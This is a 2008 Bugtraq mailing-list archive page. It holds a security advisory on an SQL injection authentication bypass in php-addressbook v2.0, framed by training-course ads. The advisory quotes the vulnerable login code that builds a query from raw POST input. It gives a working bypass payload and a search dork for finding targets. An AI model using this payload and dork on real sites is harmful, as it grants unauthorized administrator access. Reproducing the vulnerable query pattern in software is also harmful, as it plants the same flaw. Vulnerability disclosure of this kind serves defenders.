Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

php-addressbook v2.0 SQL Injection Vulnerbility

Subject: php-addressbook v2.0 SQL Injection Vulnerbility
Date: 26 Mar 2008 10:11:27 -0000
             
########################################################################
             #                                                                  
    #
             #     php-addressbook v2.0 SQL Injection Vulnerbility              
    #
             #                [admin Authentication bypass]                     
    #
             
########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi 

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: © php-addressbook v2.0
-----------------------------------
vuln code in index.php:
line 26:$username = $_POST['username'];
ine 27:$password = $_POST['password'];
and line 28:
$sql = "SELECT * FROM $usertable WHERE username='$username' AND 
password=PASSWORD('$password')";

 -----------------------
vuln:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
tnx: all hackerz 
 

<Prev in Thread] Current Thread [Next in Thread>
  • php-addressbook v2.0 SQL Injection Vulnerbility, hadihadi_zedehal_2006 <=